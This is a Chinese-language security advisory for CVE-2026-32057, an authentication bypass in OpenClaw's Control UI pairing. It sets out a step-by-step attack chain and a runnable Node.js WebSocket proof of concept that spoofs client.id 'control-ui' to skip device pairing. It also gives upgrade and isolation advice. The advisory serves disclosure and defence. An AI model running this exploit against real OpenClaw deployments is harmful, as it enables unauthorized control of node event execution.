CVE-2026-32057 CVSS 7.1 高危

CVE-2026-32057 OpenClaw认证绕过漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32057

漏洞类型

认证绕过

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.2.25之前的版本中存在严重的认证绕过漏洞。该漏洞位于受信任代理的Control UI配对机制中，由于系统缺乏对设备身份的严格验证，错误地接受了client.id=control-ui参数。攻击者可利用已认证的节点角色WebSocket客户端，通过伪造该特定标识符，成功绕过设备配对要求，进而非法获取对节点事件执行流的访问权限，造成安全隐患。

技术细节

该漏洞的核心在于OpenClaw受信任代理Control UI配对机制中的逻辑缺陷。在受影响的版本中，系统在处理WebSocket连接请求时，未充分验证请求来源的真实设备身份，而是仅依赖于client.id字段进行判断。正常情况下，Control UI的配对应当经过严格的握手与身份确认流程，但漏洞允许攻击者直接指定client.id为"control-ui"。利用此漏洞的前提是攻击者已拥有一个低权限的节点角色WebSocket客户端凭证。攻击者通过WebSocket建立连接后，发送包含恶意构造的client.id参数的控制消息。由于系统信任该ID，攻击者即可跳过必要的配对验证步骤，直接提升权限并控制节点事件执行流，导致未授权的操作被执行。

攻击链分析

STEP 1

信息收集

攻击者探测目标网络，发现OpenClaw服务实例及其WebSocket接口。

STEP 2

获取凭证

攻击者通过某种方式获取一个已认证的节点角色WebSocket客户端的低权限凭证或令牌。

STEP 3

建立连接

使用获取的凭证与OpenClaw服务器建立WebSocket连接。

STEP 4

漏洞利用

在连接过程中或发送消息时，将client.id参数设置为"control-ui"，利用系统信任该ID的缺陷，绕过设备配对验证。

STEP 5

权限提升

成功绕过验证后，攻击者获得对节点事件执行流的未授权访问权限，可执行控制操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Proof of Concept for CVE-2026-32057
// This script demonstrates how an authenticated node role websocket client
// can bypass the pairing mechanism by setting client.id to "control-ui".

const WebSocket = require('ws');

// Target URL of the vulnerable OpenClaw instance
const targetUrl = 'ws://target-openclaw-instance:8080/ws';
// A valid token for a low-privilege authenticated node role client
const authToken = 'VALID_NODE_ROLE_TOKEN'; 

const ws = new WebSocket(targetUrl, {
  headers: {
    'Authorization': authToken
  }
});

ws.on('open', function open() {
  console.log('[*] WebSocket connection established.');

  // Exploit Payload: Construct a message claiming to be the control-ui
  // The system trusts this ID and skips device identity verification
  const payload = {
    action: 'register',
    client: {
      id: 'control-ui' // Vulnerable parameter: bypasses pairing
    },
    request: {
      flow: 'execute_event'
    }
  };

  ws.send(JSON.stringify(payload));
  console.log('[*] Exploit payload sent: client.id set to control-ui');
  console.log('[*] If successful, pairing requirements are bypassed.');
});

ws.on('message', function message(data) {
  console.log('[+] Server response:', data.toString());
});

ws.on('error', function error(err) {
  console.error('[-] WebSocket error:', err);
});

影响范围

OpenClaw < 2026.2.25

防御指南

临时缓解措施

建议立即将OpenClaw升级到2026.2.25或更高版本以彻底修复该漏洞。若暂时无法升级，应实施网络隔离措施，限制WebSocket端点的访问范围，仅允许受信任的内部IP连接。同时，加强对客户端身份的校验逻辑，确保client.id参数与实际设备身份严格绑定，防止被绕过。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表